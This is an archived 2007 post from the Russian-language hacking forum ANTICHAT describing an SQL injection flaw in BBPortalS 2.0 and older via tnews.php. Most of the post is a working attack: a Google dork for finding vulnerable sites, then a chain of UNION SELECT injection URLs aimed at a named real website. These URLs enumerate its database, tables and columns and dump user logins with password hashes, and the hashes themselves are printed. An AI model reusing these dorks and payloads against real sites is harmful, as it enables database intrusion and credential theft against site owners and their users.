ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

22.10.2007, 15:00
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Уязвимость в BBPortalS <=2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием tnews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Поиск в гугл: inurl:"tnews.php?op"
Пример:
_www.actupix.net
Скуль:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12/*
Смотрим названия таблиц, меняя параметр limit:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/*
CHARACTER_SETS
COLLATIONS
----------
zypibot
85 таблиц.
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+84,1/*
Колонки:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12+from+information_schema.columns+limit+0,1/*
Таблица users:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
Админ (меняем limit и смотрим других юзеров):
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users+limit+1,1/*
Admin:418685582e6f6e65516b90feaeab6518
Patrice:418685582e6f6e65516b90feaeab6518
PS Есть эксплоит
Последний раз редактировалось -=lebed=-; 22.10.2007 в 15:15..
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|